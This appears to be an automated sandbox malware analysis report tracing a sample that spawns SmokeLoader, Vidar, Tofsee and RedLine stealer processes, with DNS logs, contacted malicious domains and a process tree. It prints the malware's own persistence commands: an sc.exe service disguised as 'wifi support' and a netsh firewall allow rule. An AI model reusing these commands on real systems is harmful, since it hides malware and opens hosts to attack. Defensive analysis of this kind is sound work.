                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.369031906 CET8.8.8.8192.168.2.40x6d85No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.455390930 CET8.8.8.8192.168.2.40x7f0dNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.845935106 CET8.8.8.8192.168.2.40x9971No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:16.711029053 CET8.8.8.8192.168.2.40x3e8cNo error (0)a0620531.xsph.ru141.8.192.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:19.249967098 CET8.8.8.8192.168.2.40xb587No error (0)dl.uploadgram.me176.9.247.226A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:19.832565069 CET8.8.8.8192.168.2.40x7534No error (0)patmushta.info8.209.79.15A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:21.011390924 CET8.8.8.8192.168.2.40xb0abNo error (0)a0620531.xsph.ru141.8.192.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.416764975 CET8.8.8.8192.168.2.40x472dNo error (0)yandex.ru5.255.255.50A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.416764975 CET8.8.8.8192.168.2.40x472dNo error (0)yandex.ru5.255.255.60A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.416764975 CET8.8.8.8192.168.2.40x472dNo error (0)yandex.ru77.88.55.50A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.416764975 CET8.8.8.8192.168.2.40x472dNo error (0)yandex.ru77.88.55.66A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:33.985415936 CET8.8.8.8192.168.2.40xf407No error (0)a0620531.xsph.ru141.8.192.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:46:10.008888006 CET8.8.8.8192.168.2.40x8403No error (0)patmushta.info8.209.79.15A (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • pggcfgsws.org
                                                                                • host-data-coin-11.com
                                                                              • gmfjy.net
                                                                              • vvrpud.org
                                                                              • plegf.org
                                                                              • yntwh.org
                                                                              • jdeywcw.net
                                                                              • yxsry.com
                                                                              • ewylxqujhk.org
                                                                              • data-host-coin-8.com
                                                                              • suliahofuf.com
                                                                              • hadtpjchr.com
                                                                              • horjbqmq.com
                                                                              • esvymsmvx.com
                                                                              • vqxvg.org
                                                                              • unicupload.top
                                                                              • unjcuxt.org
                                                                              • xuffstxn.org
                                                                              • rnopvq.net
                                                                              • lwdprkm.net
                                                                              • bnqqs.org
                                                                              • imncgs.com
                                                                              • ipbucsran.org
                                                                              • bvfkxysv.com
                                                                              • 185.7.214.171:8080
                                                                              • tomtpsvfw.org
                                                                              • gwajgepq.net
                                                                              • hqfldvwwlo.net
                                                                              • jhxpljskoo.org
                                                                              • qseyddwdi.org
                                                                              • ugynawfq.net
                                                                              • pqaspb.org
                                                                              • nkqvrbje.com
                                                                              • tceeer.com
                                                                              • rvjlsh.net
                                                                              • rxaefwr.org
                                                                              • igvekrqlt.net
                                                                                • amogohuigotuli.at
                                                                              • chuxidlayb.net
                                                                              • vgrvqyptj.org
                                                                              • cbqys.org
                                                                              • xtjppnbp.net
                                                                              • wkuthbgxw.com
                                                                              • upcunwrd.org
                                                                              • gaspj.net
                                                                              • nwxnrl.org
                                                                              • iwxef.net
                                                                              • sygdrk.org
                                                                              • npsrffrpxb.org
                                                                              • eqqeihdtfd.com
                                                                              • holwhrfuq.org
                                                                              • dnaye.net
                                                                              • nycnks.com
                                                                              • tpole.com
                                                                              • 185.163.204.22
                                                                              • kfxeicq.net
                                                                              • 185.163.204.24
                                                                              • wsnlxaykp.org
                                                                              • rwhbdb.com
                                                                              • ifihkt.net
                                                                              • qtvebqyko.net
                                                                              • vvqho.com
                                                                              • lmhfhgftt.org
                                                                              • unic11m.top
                                                                              • iilwqqrr.net
                                                                              • bjhri.com
                                                                              • wanghml.org
                                                                              • nebtobstfs.org
                                                                              • ivgwjg.com
                                                                              • enxrrgsqu.org
                                                                              • 78.46.160.87
                                                                              • ofxlqqbqej.org
                                                                              • ytdefkxsg.com
                                                                              • vnrbprjedc.org
                                                                              • a0620531.xsph.ru
                                                                              • gjxtjba.org
                                                                              • garlvmrpv.com
                                                                              • pagwfnjr.net

                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              Analysis Process: V91yW08J6p.exe PID: 6140 Parent PID: 6012

                                                                              General

                                                                              Start time:20:43:00
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\Desktop\V91yW08J6p.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\V91yW08J6p.exe"
                                                                              Imagebase:0x400000
                                                                              File size:284672 bytes
                                                                              MD5 hash:D609A21245D77DCCD6D4A659CBD9466A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Analysis Process: V91yW08J6p.exe PID: 6216 Parent PID: 6140

                                                                              General

                                                                              Start time:20:43:02
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\Desktop\V91yW08J6p.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\V91yW08J6p.exe"
                                                                              Imagebase:0x400000
                                                                              File size:284672 bytes
                                                                              MD5 hash:D609A21245D77DCCD6D4A659CBD9466A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.737039163.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.738316434.0000000002091000.00000004.00020000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Analysis Process: explorer.exe PID: 3424 Parent PID: 6216

                                                                              General

                                                                              Start time:20:43:09
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0x7ff6fee60000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000000.722834578.0000000004F01000.00000020.00020000.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              Analysis Process: adiicvb PID: 5872 Parent PID: 968

                                                                              General

                                                                              Start time:20:43:46
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Roaming\adiicvb
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\adiicvb
                                                                              Imagebase:0x400000
                                                                              File size:284672 bytes
                                                                              MD5 hash:D609A21245D77DCCD6D4A659CBD9466A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low

                                                                              Analysis Process: adiicvb PID: 6676 Parent PID: 5872

                                                                              General

                                                                              Start time:20:43:49
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Roaming\adiicvb
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\adiicvb
                                                                              Imagebase:0x400000
                                                                              File size:284672 bytes
                                                                              MD5 hash:D609A21245D77DCCD6D4A659CBD9466A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.788360446.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.788330206.0000000001F30000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Analysis Process: 7CCD.exe PID: 808 Parent PID: 3424

                                                                              General

                                                                              Start time:20:43:57
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\7CCD.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\7CCD.exe
                                                                              Imagebase:0x400000
                                                                              File size:301056 bytes
                                                                              MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.808518584.00000000021B1000.00000004.00020000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:moderate

                                                                              Analysis Process: 76E7.exe PID: 5964 Parent PID: 3424

                                                                              General

                                                                              Start time:20:44:03
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\76E7.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\76E7.exe
                                                                              Imagebase:0x400000
                                                                              File size:312320 bytes
                                                                              MD5 hash:2AE79DF2C51EF858F5483314B6B83FA0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low

                                                                              Analysis Process: 6902.exe PID: 1716 Parent PID: 3424

                                                                              General

                                                                              Start time:20:44:06
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\6902.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\6902.exe
                                                                              Imagebase:0x400000
                                                                              File size:298496 bytes
                                                                              MD5 hash:F4C254B2556531003266AF2D9D74B625
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000002.840468381.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000002.840877989.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low

                                                                              Analysis Process: 768F.exe PID: 4640 Parent PID: 3424

                                                                              General

                                                                              Start time:20:44:10
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Imagebase:0x2c0000
                                                                              File size:537088 bytes
                                                                              MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 67%, ReversingLabs
                                                                              Reputation:moderate

                                                                              Analysis Process: cmd.exe PID: 6540 Parent PID: 1716

                                                                              General

                                                                              Start time:20:44:14
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ejdjvovs\
                                                                              Imagebase:0x11d0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Analysis Process: conhost.exe PID: 5440 Parent PID: 6540

                                                                              General

                                                                              Start time:20:44:15
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Analysis Process: cmd.exe PID: 4788 Parent PID: 1716

                                                                              General

                                                                              Start time:20:44:16
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\
                                                                              Imagebase:0x11d0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Analysis Process: conhost.exe PID: 5900 Parent PID: 4788

                                                                              General

                                                                              Start time:20:44:17
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Analysis Process: sc.exe PID: 5636 Parent PID: 1716

                                                                              General

                                                                              Start time:20:44:17
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support
                                                                              Imagebase:0x20000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Analysis Process: conhost.exe PID: 816 Parent PID: 5636

                                                                              General

                                                                              Start time:20:44:18
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Analysis Process: sc.exe PID: 1496 Parent PID: 1716

                                                                              General

                                                                              Start time:20:44:18
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\sc.exe" description ejdjvovs "wifi internet conection
                                                                              Imagebase:0x20000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Analysis Process: conhost.exe PID: 1472 Parent PID: 1496

                                                                              General

                                                                              Start time:20:44:19
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Analysis Process: sc.exe PID: 6252 Parent PID: 1716

                                                                              General

                                                                              Start time:20:44:19
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\sc.exe" start ejdjvovs
                                                                              Imagebase:0x20000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Analysis Process: 768F.exe PID: 6952 Parent PID: 4640

                                                                              General

                                                                              Start time:20:44:20
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Imagebase:0x360000
                                                                              File size:537088 bytes
                                                                              MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Analysis Process: conhost.exe PID: 7124 Parent PID: 6252

                                                                              General

                                                                              Start time:20:44:20
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Analysis Process: netsh.exe PID: 6856 Parent PID: 1716

                                                                              General

                                                                              Start time:20:44:21
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                              Imagebase:0x9f0000
                                                                              File size:82944 bytes
                                                                              MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Analysis Process: qxoxlxqh.exe PID: 5788 Parent PID: 568

                                                                              General

                                                                              Start time:20:44:21
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe"
                                                                              Imagebase:0x400000
                                                                              File size:13640704 bytes
                                                                              MD5 hash:EAE6D58C8C1CB389453AF3692BF58DA8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.850016785.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.850501152.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.850539504.0000000000DB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000003.846397330.0000000000D70000.00000004.00000001.sdmp, Author: Joe Security

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >